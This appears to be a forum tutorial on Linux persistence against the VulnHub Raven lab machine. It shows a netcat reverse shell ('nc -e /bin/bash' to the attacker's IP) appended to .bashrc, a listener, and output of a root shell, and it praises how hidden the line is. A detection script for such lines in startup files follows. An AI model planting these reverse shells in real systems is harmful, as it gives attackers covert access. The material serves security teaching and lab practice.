[Linux Persistence] UNIX SHELL CONFIG - PART 4

Posted: Tue Aug 13, 2024 6:39 am
by ethical hacker
Requirements:

  1. Kali Linux OR Parrot OS
  2. Practical understanding of TCP/IP
  3. This tutorial was conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
    https://www.vulnhub.com/entry/raven-1,256/

Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.

PART 4. UNIX SHELL CONFIGURATION MODIFICATION:
This persistence method will entail the insertion of a bash reverse shell command, which shall initiate a connection back to our netcat listener, into a user account's .bashrc file. The .bashrc file is a configuration file which is employed for personalising bash, and is executed when a user logs in using the bash shell.

The initial step will involve the opening of the .bashrc file utilising a text editor. This shall be accomplished through the execution of the following command:

Code:

nano ~/.bashrc

Upon opening the aforementioned file by means of a text editor, we can incorporate a basic bash command which will afford us a reverse shell each time a user logs in. This can be achieved through the insertion of the following code:

Code:

nc -e /bin/bash <KALI-IP> <PORT>   2>/dev/null

As displayed in the subsequent terminal, the said command shall incorporate your Kali IP and the port at which netcat is in a state of listening.
Terminal

Code:

# Some more alias to avoid making mistakes:
# alias rm=' rm -i'
# alias cp=' cp -i'
# alias mv=' mv -i'

nc -e /bin/bash 192.168.2.2 1234 2>/dev/null


Having integrated the aforementioned bash command into the .bashrc file, we shall then establish a listener via Netcat on Kali by executing the ensuing directive:

Code:

nc -nvlp <PORT>

Upon a user logging in to the aforementioned user account, the command embedded within the .bashrc file shall be triggered and forthwith provide one with a reverse shell on the netcat listener, as evidenced by the ensuing terminal.
Terminal

Code:

> $ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.2.2] from (UNKNOWN) [192.168.2.100] 50123
id
uid=0(root) gid=0(root) groups=0(root)

We have now successfully established a degree of persistence by means of the .bashrc file. This method is particularly advantageous due to the concealed nature of the reverse shell command, which resides within a legitimate configuration file, thereby mitigating the likelihood of detection.
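
From the defender's side, an entry like this is found by auditing shell startup files for lines that launch network tools. The following is an added example, not part of the original post; the function names and the pattern list are assumptions, and the sample file is constructed from the terminal listing above.

```shell
#!/bin/sh
# Added example: flag non-comment lines in shell startup files that invoke
# network tools, such as the nc line this tutorial appends to ~/.bashrc.
# The pattern list is an assumption and deliberately small; extend it locally.
RC_SUSPICIOUS='(^|[;&|(/[:space:]])(nc|ncat|netcat|socat)[[:space:]]|/dev/(tcp|udp)/'

# scan_rc FILE... : print "file:line:text" for every suspicious line.
# Returns 0 if something was flagged, 1 if every readable file looks clean.
scan_rc() {
    local f out line hits=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        # grep -n keeps the original line numbers; the second grep drops
        # comment-only lines so commented-out examples do not alert.
        out=$(grep -nE "$RC_SUSPICIOUS" "$f" \
              | grep -vE '^[0-9]+:[[:space:]]*#' || true)
        if [ -n "$out" ]; then
            printf '%s\n' "$out" | while IFS= read -r line; do
                printf '%s:%s\n' "$f" "$line"
            done
            hits=0
        fi
    done
    return "$hits"
}

# make_sample PATH : write a constructed .bashrc tail modelled on the
# listing in the post (the commented-out nc line is added for the test).
make_sample() {
    cat > "$1" <<'EOF'
# Some more alias to avoid making mistakes:
# alias rm='rm -i'
# nc -e /bin/bash 10.0.0.1 4444
alias ll='ls -l'
nc -e /bin/bash 192.168.2.2 1234 2>/dev/null
EOF
}

# Scan files named on the command line, e.g. (login shells read the
# profile files, so include them alongside .bashrc):
#   sh scan_rc.sh /home/*/.bashrc /home/*/.profile /root/.bashrc /etc/profile
if [ "$#" -gt 0 ]; then
    scan_rc "$@" || echo "no suspicious lines found"
fi
```

A match is a lead for review rather than proof of compromise; comparing the flagged file against a known-good baseline or file-integrity record confirms whether the line was added.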